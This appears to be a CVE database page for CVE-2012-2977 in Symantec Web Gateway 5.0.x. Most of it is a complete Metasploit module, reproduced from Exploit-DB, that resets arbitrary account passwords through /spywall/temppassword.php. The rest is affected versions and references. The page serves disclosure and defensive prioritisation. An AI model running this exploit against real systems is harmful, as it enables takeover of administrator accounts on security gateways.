CVE-2012-2977
Description
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to change arbitrary passwords via crafted input to an application script.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change
Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)
##
# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
'Description' => %q{
This module will change the password for the specified account on a Symantec Web Gatewaye server.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 0 $",
'Author' =>
[
'Kc57',
],
'References' =>
[
[ 'CVE', '2012-2977' ],
[ 'OSVDB', '0' ],
[ 'BID', '54430' ],
[ 'URL', 'https://www.securityfocus.com/bid/54430' ],
],
'DisclosureDate' => "Jul 23 2012" ))
register_options(
[
Opt::RPORT(80),
OptString.new('USER', [ true, 'The password to reset to', 'admin']),
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
], self.class)
end
def run
print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
res = send_request_raw(
{
'method' => 'POST',
'uri' => '/spywall/temppassword.php',
}, 25)
#check to see if we get HTTP OK
if (res.code == 200)
print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
else
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to if the temppassword.php page loads or if we are redirected to the login page
if (res.body.match(/Please Select a New Password/i))
print_status("Server is vulnerable!")
else
print_error("Target doesn't seem to be vulnerable!")
return
end
print_status("Attempting to exploit password change vulnerability on #{rhost}")
print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")
data = 'target=executive_summary.php'
data << '&USERNAME=' + datastore['USER']
data << '&password=' + datastore['PASSWORD']
data << '&password2=' + datastore['PASSWORD']
data << '&Save=Save'
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/spywall/temppassword.php',
'data' => data,
}, 25)
if res.code == 200
if (res.body.match(/Thank you/i))
print_status("Password reset was successful!\n")
else
print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
end
else
print_error("Password reset failed!")
end
end
endApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| symantec | web_gateway | 5.0 | |
| symantec | web_gateway | 5.0.1 | |
| symantec | web_gateway | 5.0.2 | |
| symantec | web_gateway | 5.0.3 | |
References
- http://www.kb.cert.org/vuls/id/108471
- http://www.securityfocus.com/bid/54430
- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
- http://www.kb.cert.org/vuls/id/108471
- http://www.securityfocus.com/bid/54430
- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
CWEs
CWE-264
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.